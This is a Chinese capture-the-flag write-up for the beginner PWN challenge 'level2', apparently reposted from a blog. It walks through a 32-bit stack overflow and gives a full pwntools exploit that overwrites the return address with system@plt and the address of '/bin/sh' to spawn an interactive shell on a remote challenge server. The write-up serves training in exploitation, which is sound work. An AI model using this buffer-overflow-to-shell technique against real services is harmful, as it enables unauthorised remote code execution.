标签：攻防 binsh adr elf system 地址 level2 io PWN

攻防世界PWN简单题 level2

此题考验的是对ROP链攻击的基础

万事开头PWN第一步checksec 一下

32位的小端程序，扔进IDA

进入函数，找出栈溢出漏洞。

又是这个位置的栈溢出，read的0x100，buf的0x88，根据提示，寻找构建ROP链的攻击

直接就找到了system和/bin/sh，开始写exp

from pwn import *
io = remote('111.200.241.244',56855)
#连接远程
elf = ELF('./1ab77c073b4f4524b73e086d063f884e')
#elf载入本地程序，因为没有开PIE
system_adr = elf.plt['system']
#获取system在plt表中的地址
binsh_adr = next(elf.search(b'/bin/sh'))
#在程序搜寻binsh的地址
payload = b'a'*(0x88+4) + p32(system_adr) + b'dead'+p32(binsh_adr)
#buf定义了0x88个字节，+4覆盖ebp，填入system地址
#b'dead'是system的返回地址，我瞎写的，为了栈平衡
#传入binsh的地址
io.recv()
io.send(payload)
io.interactive()

然后去运行一下exp，攻击完成，老师，交交交。。。交卷！！！

标签：攻防,binsh,adr,elf,system,地址,level2,io,PWN
来源： https://www.cnblogs.com/ylsy1988/p/15182711.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。